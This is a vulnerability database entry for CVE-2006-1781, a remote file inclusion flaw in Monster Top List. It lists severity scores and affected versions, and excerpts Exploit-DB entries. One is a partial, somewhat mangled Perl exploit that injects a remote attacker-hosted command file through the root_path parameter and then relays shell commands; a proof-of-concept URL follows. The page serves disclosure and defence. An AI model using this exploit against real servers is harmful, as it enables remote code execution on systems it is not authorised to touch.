CVE-2006-1781
Published 2006-04-13
Priority P345 · high · 7.5 (CVSS 2.0)
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 9.59% (94.9th percentile)
PHP remote file inclusion vulnerability in functions.php in Circle R Monster Top List (MTL) 1.4 allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter. NOTE: It was later reported that 1.4.2 and earlier are affected.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| circle_r | monster_top_list | <= 1.4.2 | — |
No detection rules found.
Exploit-DB
Monster Top List 1.4.2 - 'functions.php?root_path' Remote File Inclusion
exploitdb·2007-03-20
CVE-2006-1781 Monster Top List 1.4.2 - 'functions.php?root_path' Remote File Inclusion
---
#!/usr/bin/perl
#
# Monster Top List hTTp://RSTZONE.NET .\n";
print ". [c]oded by fluffy_bunny - [email protected] .\n";
print "...............................................................\n\n";
my $kw3,$path,$shell,$conexiune,$cmd,$data ;
if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}
$path = $ARGV[0];
chomp($path);
$shell = $ARGV[1];
chomp($shell);
$path = $path."/sources/functions.php";
sub usage(){
print "Usage : perl $0 host/path http://site.com/cmd.txt\n\n";
print "Example : perl $0 http://127.0.0.1 http://site.com/cmd.txt\n\n";
print 'Shell : ';
}
while ()
{
print "[kw3rln].[rst] :~\$ ";
chomp($cmd=);
if ($cmd eq "exit") { exit(0);}
$kw3 = $path."?root_path=".$shell."?&cmd=".$cmd;
if ($cmd e
Exploit-DB
outgun 1.0.3 bot 2 - Multiple Vulnerabilities
exploitdb·2006-05-14
CVE-2006-2402 outgun 1.0.3 bot 2 - Multiple Vulnerabilities
---
# Outgun <= 1.0.3 bot 2 Multiple Remote Vulnerabilities Exploit
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/1781.zip (05132006-outgunx.zip)
# milw0rm.com [2006-05-14]
Exploit-DB
Monster Top List 1.4 - 'functions.php' Remote File Inclusion
exploitdb·2006-04-17
CVE-2006-1781 Monster Top List 1.4 - 'functions.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/17546/info
Monster Top List is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/[path]/sources/functions.php?root_path=http://www.example.com/
No writeups or analysis indexed.
http://pridels0.blogspot.com/2006/04/monstertoplist.html
http://secunia.com/advisories/19688
http://www.osvdb.org/24650
http://www.securityfocus.com/bid/17546
http://www.securityfocus.com/bid/23074
http://www.vupen.com/english/advisories/2006/1350
https://exchange.xforce.ibmcloud.com/vulnerabilities/25774
https://www.exploit-db.com/exploits/3530
Published: 2006-04-13